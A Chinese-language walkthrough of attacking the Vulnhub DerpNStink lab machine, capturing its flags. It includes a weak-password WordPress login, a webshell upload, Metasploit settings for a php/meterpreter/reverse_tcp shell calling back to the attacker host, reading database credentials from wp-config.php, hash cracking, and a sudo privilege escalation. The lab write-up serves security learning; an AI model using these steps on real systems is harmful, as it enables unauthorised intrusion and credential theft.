Vulnhub:Derpnstink靶机渗透

攻击机kali:192.168.56.108

靶机derpnstink:192.168.56.114

 

扫描同网段下存活主机

Vulnhub:Derpnstink靶机渗透_第1张图片

扫描服务版本信息

Vulnhub:Derpnstink靶机渗透_第2张图片

 

开启了21、22、80端口,分别对应着ftp、ssh、http服务,打开浏览器进行访问

Vulnhub:Derpnstink靶机渗透_第3张图片

 

查看源代码发现flag1和info.txt

Vulnhub:Derpnstink靶机渗透_第4张图片

 点开info.txt

Vulnhub:Derpnstink靶机渗透_第5张图片

这个的意思就是要让我们在本地添加一个dns解析,先不管 因为还不知道具体要添加的东西

接着使用工具扫描网站目录,发现了robots.txt文件,weblog目录下存在登录页面,php目录下有phpmyadmin,都访问看看有什么有用的信息,太多了这里就不一一列出了

Vulnhub:Derpnstink靶机渗透_第6张图片

进行访问的时候会发现weblog目录下的都打不开

Vulnhub:Derpnstink靶机渗透_第7张图片

刚好前面也拿到提示说要在本地添加一个dns记录,

Linux系统在/etc/hosts文件中进行添加

Vulnhub:Derpnstink靶机渗透_第8张图片

添加了之后就可以正常访问了,访问刚刚扫目录得到的登录页面,

Vulnhub:Derpnstink靶机渗透_第9张图片

很明显是一个wordpress的网站

使用awvs扫描网站发现存在弱口令admin/admin

Vulnhub:Derpnstink靶机渗透_第10张图片

 登录到刚刚的网站

Vulnhub:Derpnstink靶机渗透_第11张图片

 

登录成功后在slideshow的manage slides的add new发现可以上传文件,二话不说直接传个马然后蚁剑连接

Vulnhub:Derpnstink靶机渗透_第12张图片

查找配置文件并查看,拿到数据库的用户名和密码

Vulnhub:Derpnstink靶机渗透_第13张图片

获取数据库用户名和密码的第二种方法:

使用wpscan对wordpress网站进行扫描

Vulnhub:Derpnstink靶机渗透_第14张图片

发现这个插件存在漏洞,进入msf查看有没有可以利用的模块

Vulnhub:Derpnstink靶机渗透_第15张图片

发现存在可以利用的模块,直接一把梭拿shell

use 1

set payload php/meterpreter/reverse_tcp

set rhosts 192.168.56.114

set lhost 192.168.56.108

set targeturi /weblog

set wp_user admin

set wp_password admin

 

Vulnhub:Derpnstink靶机渗透_第16张图片

shell,进入一个交互式的shell,然后查看配置文件cat /var/www/html/weblog/wp-config.php

Vulnhub:Derpnstink靶机渗透_第17张图片

发现了数据库的账号密码,而前面找到的phpmyadmin页面就是一个mysql数据库管理页面,进行登录,登录成功后经过一番寻找发现了flag2

Vulnhub:Derpnstink靶机渗透_第18张图片

同时还发现了另外一个账号密码

Vulnhub:Derpnstink靶机渗透_第19张图片

将密码的哈希值保存到一个文件里,然后用john进行解密

47a170fad8f24a8ca9f76bd6ce05ded4.png

 Vulnhub:Derpnstink靶机渗透_第20张图片

得到密码为wedgie57,同时在班级home目录下发现了两个用户:mrderp,stinky

尝试切换到stinky用户,密码使用刚刚破解得到的wedgie57

Vulnhub:Derpnstink靶机渗透_第21张图片

成功切换到stinky用户,进入到stinky目录并查看当前目录的所有文件

Vulnhub:Derpnstink靶机渗透_第22张图片

在Desktop目录发现了flag3

Vulnhub:Derpnstink靶机渗透_第23张图片

在Documents目录发现了一个derpissues.pcap数据包文件,但是发现无法将其下载到本地,可以先将其复制到tmp目录下,然后在蚁剑拿到的shell中将其进行下载,下载之后用wireshark打开进行分析,过滤,发现了mrderp的登录密码

Vulnhub:Derpnstink靶机渗透_第24张图片

在shell里切换登录到mrderp,发现不可行

Vulnhub:Derpnstink靶机渗透_第25张图片

接着尝试使用ssh进行远程连接

Vulnhub:Derpnstink靶机渗透_第26张图片

连接成功,并在Desktop目录下发现了一个日志文件

Vulnhub:Derpnstink靶机渗透_第27张图片

打开后发现是个聊天记录,要我们访问https://pastebin.com/RzK9WfGw

Vulnhub:Derpnstink靶机渗透_第28张图片

Vulnhub:Derpnstink靶机渗透_第29张图片

根据该信息的提示,使用二进制提权。先创建一个binaries文件夹,进入到binaries文件夹将/bin/bash写入到derpy.sh文件中并赋予其权限,然后使用sudo命令运行该文件就成功提权为root权限了

mkdir binaries

cd binaries

echo “/bin/bash” >> derpy.sh

chmod +x derpy.sh

sudo ./derpy.sh

 

Vulnhub:Derpnstink靶机渗透_第30张图片

最后在root目录下的Desktop目录找到最后一个flag

 

你可能感兴趣的:(ctf实战,php,服务器)